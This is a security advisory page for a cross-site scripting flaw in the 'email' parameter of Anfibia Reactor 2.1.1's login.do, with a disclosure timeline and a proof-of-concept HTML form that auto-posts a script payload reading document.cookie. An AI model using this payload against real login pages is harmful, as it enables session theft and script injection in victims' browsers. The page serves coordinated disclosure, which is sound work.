Anfibia Reactor 2.1.1 Cross Site Scripting

2011-04-06 / 2011-04-07
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!-- Anfibia Reactor 2.1.1 (login.do) Remote XSS POST Injection Vulnerability Vendor: Anfibia Software Product web page: http://www.anfibia-soft.com Affected version: 2.1.1.12 Summary: Fast web-based server monitoring. Keep an eye on servers, connections, databases, cpu, hard drives and more! Desc: The Anfibia Reactor JS service suffers from a XSS vulnerability when parsing user input to the 'email' parameter via POST method in 'reactor/login.do' script at the manager login interface. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. Tested on: Microsoft Windows XP Professional SP3 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk [14.03.2011] Vulnerability discovered. [16.03.2011] Contact with the vendor. [16.03.2011] Vendor replies asking more details. [16.03.2011] Sent vulnerability details to vendor. [16.03.2011] Vendor confirms XSS issue. [06.04.2011] Vendor releases version 3 to address this issue. [06.04.2011] Coordinated public advisory released. Advisory ID: ZSL-2011-5008 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5008.php Vendor Advisory: http://www.anfibia-soft.com/products/reactor/whatsnew.htm http://www.anfibia-soft.com/products/reactor/help/Introduction/The%20New%20Anfibia%20reactor.htm Vendor Patch: http://www.anfibia-soft.com/download/anfibiareactorsetup.exe 14.03.2011 --> <html> <title>Anfibia Reactor 2.1.1 Remote XSS POST Injection Vulnerability</title> <body bgcolor="#1C1C1C"> <script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script> <form action="http://10.0.0.17:2188/reactor/login.do" enctype="application/x-www-form-urlencoded" method="POST" id="xss"> <input type="hidden" name="token" id="token" value="" /> <input type="hidden" name="passwdhash" id="passwdhash" /> <input type="hidden" name="email" id="email" value='"><script>alert(document.cookie)</script>' /> <input type="hidden" name="password" id="password" /> </form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a> </body> </html>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5008.php
http://www.anfibia-soft.com/products/reactor/whatsnew.htm


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top